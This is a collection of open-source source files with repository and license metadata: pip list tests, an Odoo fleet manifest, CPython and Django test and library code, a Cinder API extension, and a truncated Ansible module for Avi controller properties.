        '@0.1#egg=pip-test-package'
    )
    result = script.pip(
        'list', '-f', data.find_links, '--no-index', '--outdated',
        expect_stderr=True,
    )
    # Outdated entries report the newest available version and its format.
    assert 'simple (1.0) - Latest: 3.0 [sdist]' in result.stdout
    assert 'simplewheel (1.0) - Latest: 2.0 [wheel]' in result.stdout
    assert 'pip-test-package (0.1, ' in result.stdout
    assert ' Latest: 0.1.1 [sdist]' in result.stdout
    assert 'simple2' not in result.stdout, str(result)  # 3.0 is latest
@pytest.mark.network
def test_editables_flag(script, data):
    """
    Test the behavior of --editables flag in the list command
    """
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    result = script.pip(
        'install', '-e',
        'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
    )
    result = script.pip('list', '--editable')
    # Only the editable (VCS checkout) install may appear in the output.
    assert 'simple (1.0)' not in result.stdout, str(result)
    assert os.path.join('src', 'pip-test-package') in result.stdout, (
        str(result)
    )
@pytest.mark.network
def test_uptodate_editables_flag(script, data):
    """
    test the behavior of --editable --uptodate flag in the list command
    """
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    result = script.pip(
        'install', '-e',
        'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
    )
    result = script.pip(
        'list', '-f', data.find_links, '--no-index',
        '--editable', '--uptodate',
        expect_stderr=True,
    )
    # --editable restricts the output to editable installs only.
    assert 'simple (1.0)' not in result.stdout, str(result)
    assert os.path.join('src', 'pip-test-package') in result.stdout, (
        str(result)
    )
@pytest.mark.network
def test_outdated_editables_flag(script, data):
    """
    test the behavior of --editable --outdated flag in the list command
    """
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    # Pin the editable checkout at the older 0.1 tag so it is outdated.
    result = script.pip(
        'install', '-e',
        'git+https://github.com/pypa/pip-test-package.git'
        '@0.1#egg=pip-test-package'
    )
    result = script.pip(
        'list', '-f', data.find_links, '--no-index',
        '--editable', '--outdated',
        expect_stderr=True,
    )
    # Only the editable install may appear; 'simple' is not editable.
    assert 'simple (1.0)' not in result.stdout, str(result)
    assert os.path.join('src', 'pip-test-package') in result.stdout, (
        str(result)
    )
def test_outdated_pre(script, data):
    """``pip list --outdated`` only offers pre-releases when --pre is given."""
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    # Let's build a fake wheelhouse
    script.scratch_path.join("wheelhouse").mkdir()
    wheelhouse_path = script.scratch_path / 'wheelhouse'
    # simple-1.1 is a final release; simple-2.0.dev0 is a pre-release.
    wheelhouse_path.join('simple-1.1-py2.py3-none-any.whl').write('')
    wheelhouse_path.join('simple-2.0.dev0-py2.py3-none-any.whl').write('')
    result = script.pip('list', '--no-index', '--find-links', wheelhouse_path)
    assert 'simple (1.0)' in result.stdout
    result = script.pip('list', '--no-index', '--find-links', wheelhouse_path,
                        '--outdated')
    # Without --pre, the dev release must not be suggested as an upgrade.
    assert 'simple (1.0) - Latest: 1.1 [wheel]' in result.stdout
    result_pre = script.pip('list', '--no-index',
                            '--find-links', wheelhouse_path,
                            '--outdated', '--pre')
    # With --pre, the newest pre-release becomes the upgrade candidate.
    assert 'simple (1.0) - Latest: 2.0.dev0 [wheel]' in result_pre.stdout
| mit |
SAM-IT-SA/odoo | addons/fleet/__openerp__.py | 267 | 2245 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    # Odoo/OpenERP addon manifest for the Fleet Management module.
    'name' : 'Fleet Management',
    'version' : '0.1',
    'author' : 'OpenERP S.A.',
    # Ordering weight in the apps list (lower sorts first).
    'sequence': 110,
    'category': 'Managing vehicles and contracts',
    'website' : 'https://www.odoo.com/page/fleet',
    'summary' : 'Vehicle, leasing, insurances, costs',
    'description' : """
Vehicle, leasing, insurances, cost
==================================
With this module, Odoo helps you managing all your vehicles, the
contracts associated to those vehicle as well as services, fuel log
entries, costs and many other features necessary to the management
of your fleet of vehicle(s)
Main Features
-------------
* Add vehicles to your fleet
* Manage contracts for vehicles
* Reminder when a contract reach its expiration date
* Add services, fuel log entry, odometer values for all vehicles
* Show all costs associated to a vehicle or to a type of service
* Analysis graph for costs
""",
    # Modules that must be installed before this one.
    'depends' : [
        'base',
        'mail',
        'board'
    ],
    # Data files loaded at install/update time (order matters).
    'data' : [
        'security/fleet_security.xml',
        'security/ir.model.access.csv',
        'fleet_view.xml',
        'fleet_cars.xml',
        'fleet_data.xml',
        'fleet_board_view.xml',
    ],
    # Demo data, loaded only when demo mode is enabled.
    'demo': ['fleet_demo.xml'],
    'installable' : True,
    # Shown as a full application, not a technical module.
    'application' : True,
}
| agpl-3.0 |
antb/TPT----My-old-mod | src/python/stdlib/test/test_bigaddrspace.py | 133 | 1303 | from test import test_support
from test.test_support import bigaddrspacetest, MAX_Py_ssize_t
import unittest
import operator
import sys
class StrTest(unittest.TestCase):
    """Check that str operations near MAX_Py_ssize_t raise OverflowError.

    The @bigaddrspacetest decorator skips these tests unless the test run
    has been granted enough address space (see test_support).
    """

    @bigaddrspacetest
    def test_concat(self):
        # A maximum-length string plus one more byte must overflow
        # rather than wrap around.
        s1 = 'x' * MAX_Py_ssize_t
        self.assertRaises(OverflowError, operator.add, s1, '?')

    @bigaddrspacetest
    def test_optimized_concat(self):
        x = 'x' * MAX_Py_ssize_t
        try:
            x = x + '?'     # this statement uses a fast path in ceval.c
        except OverflowError:
            pass
        else:
            self.fail("should have raised OverflowError")
        try:
            x += '?'        # this statement uses a fast path in ceval.c
        except OverflowError:
            pass
        else:
            self.fail("should have raised OverflowError")
        # The operand must be left unchanged after the failed concatenations.
        self.assertEqual(len(x), MAX_Py_ssize_t)
### the following test is pending a patch
# (http://mail.python.org/pipermail/python-dev/2006-July/067774.html)
#@bigaddrspacetest
#def test_repeat(self):
# self.assertRaises(OverflowError, operator.mul, 'x', MAX_Py_ssize_t + 1)
def test_main():
    """Entry point used by Python's regrtest machinery."""
    test_support.run_unittest(StrTest)
if __name__ == '__main__':
    # An optional command-line argument caps the memory the tests may use,
    # e.g. "python test_bigaddrspace.py 4G".
    if len(sys.argv) > 1:
        test_support.set_memlimit(sys.argv[1])
    test_main()
| gpl-2.0 |
Paul-Ezell/cinder-1 | cinder/api/contrib/image_create.py | 44 | 1062 | # Copyright (c) 2012 NTT.
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Create Volume from Image extension."""
from cinder.api import extensions
class Image_create(extensions.ExtensionDescriptor):
    """Allow creating a volume from an image in the Create Volume v1 API."""

    # Human-readable extension name exposed by the extensions API.
    name = "CreateVolumeExtension"
    # Alias used in request bodies/URLs to refer to this extension.
    alias = "os-image-create"
    # XML namespace for the legacy XML serialization of this extension.
    namespace = "http://docs.openstack.org/volume/ext/image-create/api/v1"
    # Last-updated timestamp, ISO 8601.
    updated = "2012-08-13T00:00:00+00:00"
| apache-2.0 |
WillisXChen/django-oscar | oscar/lib/python2.7/site-packages/django/contrib/gis/measure.py | 118 | 12286 | # Copyright (c) 2007, Robert Coup <robert.coup@onetrackmind.co.nz>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Distance nor the names of its contributors may be used
# to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""
Distance and Area objects to allow for sensible and convenient calculation
and conversions.
Authors: Robert Coup, Justin Bronn, Riccardo Di Virgilio
Inspired by GeoPy (http://exogen.case.edu/projects/geopy/)
and Geoff Biggs' PhD work on dimensioned units for robotics.
"""
__all__ = ['A', 'Area', 'D', 'Distance']
from decimal import Decimal
from django.utils import six
from django.utils.functional import total_ordering
NUMERIC_TYPES = six.integer_types + (float, Decimal)
AREA_PREFIX = "sq_"
def pretty_name(obj):
    """Return a human-readable class name for *obj*.

    If *obj* is itself a class, return its own name; otherwise return the
    name of its class.  Used to build the error messages in the measure
    operators below.
    """
    # Use an identity check against ``type`` (PEP 8: compare types with
    # ``is``); ``==`` worked only by coincidence here.
    return obj.__name__ if obj.__class__ is type else obj.__class__.__name__
@total_ordering
class MeasureBase(object):
    """
    Base class for measures such as ``Distance`` and ``Area``.

    The numeric value is stored on the attribute named by ``STANDARD_UNIT``;
    every other unit listed in ``UNITS`` is exposed as a converted attribute
    (e.g. ``Distance(m=1000).km == 1``).  Arithmetic and comparisons operate
    on the standard-unit value.
    """

    STANDARD_UNIT = None  # Attribute name of the canonical unit (e.g. 'm').
    ALIAS = {}    # Long unit name -> canonical short unit name.
    UNITS = {}    # Short unit name -> conversion factor to STANDARD_UNIT.
    LALIAS = {}   # Lower-cased copy of ALIAS for case-insensitive lookups.

    def __init__(self, default_unit=None, **kwargs):
        """Accept value(s) by unit keyword, e.g. ``Distance(km=1, m=10)``."""
        value, self._default_unit = self.default_units(kwargs)
        setattr(self, self.STANDARD_UNIT, value)
        if default_unit and isinstance(default_unit, six.string_types):
            self._default_unit = default_unit

    def _get_standard(self):
        return getattr(self, self.STANDARD_UNIT)

    def _set_standard(self, value):
        setattr(self, self.STANDARD_UNIT, value)

    # The value expressed in the standard unit, whatever that unit is.
    standard = property(_get_standard, _set_standard)

    def __getattr__(self, name):
        # Resolve any known unit name to the converted value on the fly.
        if name in self.UNITS:
            return self.standard / self.UNITS[name]
        else:
            raise AttributeError('Unknown unit type: %s' % name)

    def __repr__(self):
        return '%s(%s=%s)' % (pretty_name(self), self._default_unit,
                              getattr(self, self._default_unit))

    def __str__(self):
        return '%s %s' % (getattr(self, self._default_unit), self._default_unit)

    # **** Comparison methods ****

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.standard == other.standard
        else:
            return NotImplemented

    def __lt__(self, other):
        # @total_ordering derives <=, > and >= from __lt__ and __eq__.
        if isinstance(other, self.__class__):
            return self.standard < other.standard
        else:
            return NotImplemented

    # **** Operators methods ****

    def __add__(self, other):
        if isinstance(other, self.__class__):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard + other.standard)})
        else:
            raise TypeError('%(class)s must be added with %(class)s' % {"class": pretty_name(self)})

    def __iadd__(self, other):
        if isinstance(other, self.__class__):
            self.standard += other.standard
            return self
        else:
            raise TypeError('%(class)s must be added with %(class)s' % {"class": pretty_name(self)})

    def __sub__(self, other):
        if isinstance(other, self.__class__):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard - other.standard)})
        else:
            raise TypeError('%(class)s must be subtracted from %(class)s' % {"class": pretty_name(self)})

    def __isub__(self, other):
        if isinstance(other, self.__class__):
            self.standard -= other.standard
            return self
        else:
            raise TypeError('%(class)s must be subtracted from %(class)s' % {"class": pretty_name(self)})

    def __mul__(self, other):
        # Only scaling by a plain number is supported at this level;
        # Distance overrides this to produce an Area.
        if isinstance(other, NUMERIC_TYPES):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard * other)})
        else:
            raise TypeError('%(class)s must be multiplied with number' % {"class": pretty_name(self)})

    def __imul__(self, other):
        if isinstance(other, NUMERIC_TYPES):
            self.standard *= float(other)
            return self
        else:
            raise TypeError('%(class)s must be multiplied with number' % {"class": pretty_name(self)})

    def __rmul__(self, other):
        return self * other

    def __truediv__(self, other):
        # Measure / Measure yields a unitless ratio; Measure / number scales.
        if isinstance(other, self.__class__):
            return self.standard / other.standard
        if isinstance(other, NUMERIC_TYPES):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard / other)})
        else:
            raise TypeError('%(class)s must be divided with number or %(class)s' % {"class": pretty_name(self)})

    def __div__(self, other):   # Python 2 compatibility
        return type(self).__truediv__(self, other)

    def __itruediv__(self, other):
        if isinstance(other, NUMERIC_TYPES):
            self.standard /= float(other)
            return self
        else:
            raise TypeError('%(class)s must be divided with number' % {"class": pretty_name(self)})

    def __idiv__(self, other):  # Python 2 compatibility
        return type(self).__itruediv__(self, other)

    def __bool__(self):
        return bool(self.standard)

    def __nonzero__(self):      # Python 2 compatibility
        return type(self).__bool__(self)

    def default_units(self, kwargs):
        """
        Return the unit value and the default units specified
        from the given keyword arguments dictionary.
        """
        val = 0.0
        default_unit = self.STANDARD_UNIT
        for unit, value in six.iteritems(kwargs):
            if not isinstance(value, float):
                value = float(value)
            if unit in self.UNITS:
                val += self.UNITS[unit] * value
                default_unit = unit
            elif unit in self.ALIAS:
                u = self.ALIAS[unit]
                val += self.UNITS[u] * value
                default_unit = u
            else:
                # Fall back to a case-insensitive match before giving up.
                lower = unit.lower()
                if lower in self.UNITS:
                    val += self.UNITS[lower] * value
                    default_unit = lower
                elif lower in self.LALIAS:
                    u = self.LALIAS[lower]
                    val += self.UNITS[u] * value
                    default_unit = u
                else:
                    raise AttributeError('Unknown unit type: %s' % unit)
        return val, default_unit

    @classmethod
    def unit_attname(cls, unit_str):
        """
        Retrieves the unit attribute name for the given unit string.
        For example, if the given unit string is 'metre', 'm' would be returned.
        An exception is raised if an attribute cannot be found.
        """
        lower = unit_str.lower()
        if unit_str in cls.UNITS:
            return unit_str
        elif lower in cls.UNITS:
            return lower
        elif lower in cls.LALIAS:
            return cls.LALIAS[lower]
        else:
            # Fix: raise AttributeError, matching __getattr__ and
            # default_units, instead of a bare Exception.  AttributeError
            # subclasses Exception, so existing broad handlers still work.
            raise AttributeError('Could not find a unit keyword associated with "%s"' % unit_str)
class Distance(MeasureBase):
    """A linear measure; the standard unit is the metre ('m')."""

    STANDARD_UNIT = "m"

    # Conversion factors: metres per one of the named unit.
    UNITS = {
        'chain': 20.1168,
        'chain_benoit': 20.116782,
        'chain_sears': 20.1167645,
        'british_chain_benoit': 20.1167824944,
        'british_chain_sears': 20.1167651216,
        'british_chain_sears_truncated': 20.116756,
        'cm': 0.01,
        'british_ft': 0.304799471539,
        'british_yd': 0.914398414616,
        'clarke_ft': 0.3047972654,
        'clarke_link': 0.201166195164,
        'fathom': 1.8288,
        'ft': 0.3048,
        'german_m': 1.0000135965,
        'gold_coast_ft': 0.304799710181508,
        'indian_yd': 0.914398530744,
        'inch': 0.0254,
        'km': 1000.0,
        'link': 0.201168,
        'link_benoit': 0.20116782,
        'link_sears': 0.20116765,
        'm': 1.0,
        'mi': 1609.344,
        'mm': 0.001,
        'nm': 1852.0,
        'nm_uk': 1853.184,
        'rod': 5.0292,
        'sears_yd': 0.91439841,
        'survey_ft': 0.304800609601,
        'um': 0.000001,
        'yd': 0.9144,
    }

    # Unit aliases for `UNIT` terms encountered in Spatial Reference WKT.
    ALIAS = {
        'centimeter': 'cm',
        'foot': 'ft',
        'inches': 'inch',
        'kilometer': 'km',
        'kilometre': 'km',
        'meter': 'm',
        'metre': 'm',
        'micrometer': 'um',
        'micrometre': 'um',
        'millimeter': 'mm',
        'millimetre': 'mm',
        'mile': 'mi',
        'yard': 'yd',
        'British chain (Benoit 1895 B)': 'british_chain_benoit',
        'British chain (Sears 1922)': 'british_chain_sears',
        'British chain (Sears 1922 truncated)': 'british_chain_sears_truncated',
        'British foot (Sears 1922)': 'british_ft',
        'British foot': 'british_ft',
        'British yard (Sears 1922)': 'british_yd',
        'British yard': 'british_yd',
        "Clarke's Foot": 'clarke_ft',
        "Clarke's link": 'clarke_link',
        'Chain (Benoit)': 'chain_benoit',
        'Chain (Sears)': 'chain_sears',
        'Foot (International)': 'ft',
        'German legal metre': 'german_m',
        'Gold Coast foot': 'gold_coast_ft',
        'Indian yard': 'indian_yd',
        'Link (Benoit)': 'link_benoit',
        'Link (Sears)': 'link_sears',
        'Nautical Mile': 'nm',
        'Nautical Mile (UK)': 'nm_uk',
        'US survey foot': 'survey_ft',
        'U.S. Foot': 'survey_ft',
        'Yard (Indian)': 'indian_yd',
        'Yard (Sears)': 'sears_yd'
    }
    # Case-insensitive alias lookup table.
    LALIAS = {k.lower(): v for k, v in ALIAS.items()}

    def __mul__(self, other):
        # Distance * Distance yields an Area; Distance * number scales.
        if isinstance(other, self.__class__):
            return Area(default_unit=AREA_PREFIX + self._default_unit,
                        **{AREA_PREFIX + self.STANDARD_UNIT: (self.standard * other.standard)})
        elif isinstance(other, NUMERIC_TYPES):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard * other)})
        else:
            raise TypeError('%(distance)s must be multiplied with number or %(distance)s' % {
                "distance": pretty_name(self.__class__),
            })
class Area(MeasureBase):
    """An area measure; the standard unit is the square metre ('sq_m')."""

    STANDARD_UNIT = AREA_PREFIX + Distance.STANDARD_UNIT
    # Getting the square units values and the alias dictionary.
    UNITS = {'%s%s' % (AREA_PREFIX, k): v ** 2 for k, v in Distance.UNITS.items()}
    ALIAS = {k: '%s%s' % (AREA_PREFIX, v) for k, v in Distance.ALIAS.items()}
    LALIAS = {k.lower(): v for k, v in ALIAS.items()}

    def __truediv__(self, other):
        # NOTE(review): unlike MeasureBase.__truediv__, this override does not
        # support Area / Area; dividing by another Area raises TypeError.
        if isinstance(other, NUMERIC_TYPES):
            return self.__class__(default_unit=self._default_unit,
                                  **{self.STANDARD_UNIT: (self.standard / other)})
        else:
            raise TypeError('%(class)s must be divided by a number' % {"class": pretty_name(self)})

    def __div__(self, other):   # Python 2 compatibility
        return type(self).__truediv__(self, other)
# Shortcuts: abbreviated constructors matching __all__ above.
D = Distance
A = Area
| bsd-3-clause |
willingc/oh-mainline | vendor/packages/Django/tests/modeltests/field_subclassing/fields.py | 115 | 2164 | from __future__ import unicode_literals
import json
from django.db import models
from django.utils.encoding import force_text
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Small(object):
    """
    A simple class to show that non-trivial Python objects can be used as
    attributes.
    """

    def __init__(self, first, second):
        # Store both halves; they are concatenated by __str__ below.
        self.first, self.second = first, second

    def __str__(self):
        return '%s%s' % (force_text(self.first), force_text(self.second))
class SmallField(six.with_metaclass(models.SubfieldBase, models.Field)):
    """
    Turns the "Small" class into a Django field. Because of the similarities
    with normal character fields and the fact that Small.__unicode__ does
    something sensible, we don't need to implement a lot here.
    """

    def __init__(self, *args, **kwargs):
        # A Small value always serializes to exactly two characters.
        kwargs['max_length'] = 2
        super(SmallField, self).__init__(*args, **kwargs)

    def get_internal_type(self):
        # Stored in the database as an ordinary character column.
        return 'CharField'

    def to_python(self, value):
        if isinstance(value, Small):
            return value
        # assumes value is a 2-character string from the DB -- TODO confirm
        return Small(value[0], value[1])

    def get_db_prep_save(self, value, connection):
        # Persist via the object's string form (see Small.__str__).
        return six.text_type(value)

    def get_prep_lookup(self, lookup_type, value):
        if lookup_type == 'exact':
            return force_text(value)
        if lookup_type == 'in':
            return [force_text(v) for v in value]
        if lookup_type == 'isnull':
            return []
        raise TypeError('Invalid lookup type: %r' % lookup_type)
class SmallerField(SmallField):
    # No overrides; a distinct subclass, presumably to exercise inheritance
    # of custom fields in the test suite -- verify against callers.
    pass
class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):
    """A TextField that transparently (de)serializes values as JSON."""

    # Fix: user-visible description had a typo ("desializes").
    description = ("JSONField automatically serializes and deserializes values to "
                   "and from JSON.")

    def to_python(self, value):
        # Falsy values (None, '') mean "no data" and normalize to None.
        if not value:
            return None
        if isinstance(value, six.string_types):
            value = json.loads(value)
        return value

    def get_db_prep_save(self, value, connection):
        if value is None:
            return None
        return json.dumps(value)
| agpl-3.0 |
benthomasson/ansible | lib/ansible/modules/network/avi/avi_controllerproperties.py | 7 | 13790 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.2
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module maturity/support metadata consumed by Ansible's doc tooling.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_controllerproperties
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of ControllerProperties Avi RESTful Object
description:
- This module is used to configure ControllerProperties object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
allow_ip_forwarding:
description:
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
allow_unauthenticated_apis:
description:
- Allow unauthenticated access for special apis.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
allow_unauthenticated_nodes:
description:
- Boolean flag to set allow_unauthenticated_nodes.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
api_idle_timeout:
description:
- Allowed values are 0-1440.
- Default value when not specified in API or module is interpreted by Avi Controller as 15.
appviewx_compat_mode:
description:
- Export configuration in appviewx compatibility mode.
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
attach_ip_retry_interval:
description:
- Number of attach_ip_retry_interval.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
attach_ip_retry_limit:
description:
- Number of attach_ip_retry_limit.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
cluster_ip_gratuitous_arp_period:
description:
- Number of cluster_ip_gratuitous_arp_period.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
crashed_se_reboot:
description:
- Number of crashed_se_reboot.
- Default value when not specified in API or module is interpreted by Avi Controller as 900.
dead_se_detection_timer:
description:
- Number of dead_se_detection_timer.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
dns_refresh_period:
description:
- Number of dns_refresh_period.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
dummy:
description:
- Number of dummy.
fatal_error_lease_time:
description:
- Number of fatal_error_lease_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
max_dead_se_in_grp:
description:
- Number of max_dead_se_in_grp.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
max_pcap_per_tenant:
description:
- Maximum number of pcap files stored per tenant.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
max_seq_vnic_failures:
description:
- Number of max_seq_vnic_failures.
- Default value when not specified in API or module is interpreted by Avi Controller as 3.
persistence_key_rotate_period:
description:
- Allowed values are 1-1051200.
- Special values are 0 - 'disabled'.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
portal_token:
description:
- Token used for uploading tech-support to portal.
- Field introduced in 16.4.6,17.1.2.
version_added: "2.4"
query_host_fail:
description:
- Number of query_host_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 180.
se_create_timeout:
description:
- Number of se_create_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 900.
se_failover_attempt_interval:
description:
- Interval between attempting failovers to an se.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
se_offline_del:
description:
- Number of se_offline_del.
- Default value when not specified in API or module is interpreted by Avi Controller as 172000.
se_vnic_cooldown:
description:
- Number of se_vnic_cooldown.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
secure_channel_cleanup_timeout:
description:
- Number of secure_channel_cleanup_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
secure_channel_controller_token_timeout:
description:
- Number of secure_channel_controller_token_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
secure_channel_se_token_timeout:
description:
- Number of secure_channel_se_token_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
seupgrade_fabric_pool_size:
description:
- Pool size used for all fabric commands during se upgrade.
- Default value when not specified in API or module is interpreted by Avi Controller as 20.
seupgrade_segroup_min_dead_timeout:
description:
- Time to wait before marking segroup upgrade as stuck.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
ssl_certificate_expiry_warning_days:
description:
- Number of days for ssl certificate expiry warning.
unresponsive_se_reboot:
description:
- Number of unresponsive_se_reboot.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
upgrade_dns_ttl:
description:
- Time to account for dns ttl during upgrade.
- This is in addition to vs_scalein_timeout_for_upgrade in se_group.
- Field introduced in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as 5.
upgrade_lease_time:
description:
- Number of upgrade_lease_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
vnic_op_fail_time:
description:
- Number of vnic_op_fail_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 180.
vs_apic_scaleout_timeout:
description:
- Time to wait for the scaled out se to become ready before marking the scaleout done, applies to apic configuration only.
- Default value when not specified in API or module is interpreted by Avi Controller as 360.
vs_awaiting_se_timeout:
description:
- Number of vs_awaiting_se_timeout.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_key_rotate_period:
description:
- Allowed values are 1-1051200.
- Special values are 0 - 'disabled'.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_se_bootup_fail:
description:
- Number of vs_se_bootup_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
vs_se_create_fail:
description:
- Number of vs_se_create_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 1500.
vs_se_ping_fail:
description:
- Number of vs_se_ping_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 60.
vs_se_vnic_fail:
description:
- Number of vs_se_vnic_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
vs_se_vnic_ip_fail:
description:
- Number of vs_se_vnic_ip_fail.
- Default value when not specified in API or module is interpreted by Avi Controller as 120.
warmstart_se_reconnect_wait_time:
description:
- Number of warmstart_se_reconnect_wait_time.
- Default value when not specified in API or module is interpreted by Avi Controller as 300.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create ControllerProperties object
avi_controllerproperties:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_controllerproperties
"""
RETURN = '''
obj:
description: ControllerProperties (api/controllerproperties) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
# The Avi SDK helpers are optional; when they are missing, main() reports a
# friendly error instead of this module crashing at import time.
try:
    from ansible.module_utils.avi import (
        avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
    HAS_AVI = False
def main():
    """Ansible entry point: declare the module's arguments and drive the
    Avi ControllerProperties API via the shared avi_ansible_api helper."""
    argument_specs = dict(
        state=dict(default='present',
                   choices=['absent', 'present']),
        allow_ip_forwarding=dict(type='bool',),
        allow_unauthenticated_apis=dict(type='bool',),
        allow_unauthenticated_nodes=dict(type='bool',),
        api_idle_timeout=dict(type='int',),
        appviewx_compat_mode=dict(type='bool',),
        attach_ip_retry_interval=dict(type='int',),
        attach_ip_retry_limit=dict(type='int',),
        cluster_ip_gratuitous_arp_period=dict(type='int',),
        crashed_se_reboot=dict(type='int',),
        dead_se_detection_timer=dict(type='int',),
        dns_refresh_period=dict(type='int',),
        dummy=dict(type='int',),
        fatal_error_lease_time=dict(type='int',),
        max_dead_se_in_grp=dict(type='int',),
        max_pcap_per_tenant=dict(type='int',),
        max_seq_vnic_failures=dict(type='int',),
        persistence_key_rotate_period=dict(type='int',),
        # Sensitive: no_log keeps the token out of logs and diffs.
        portal_token=dict(type='str', no_log=True,),
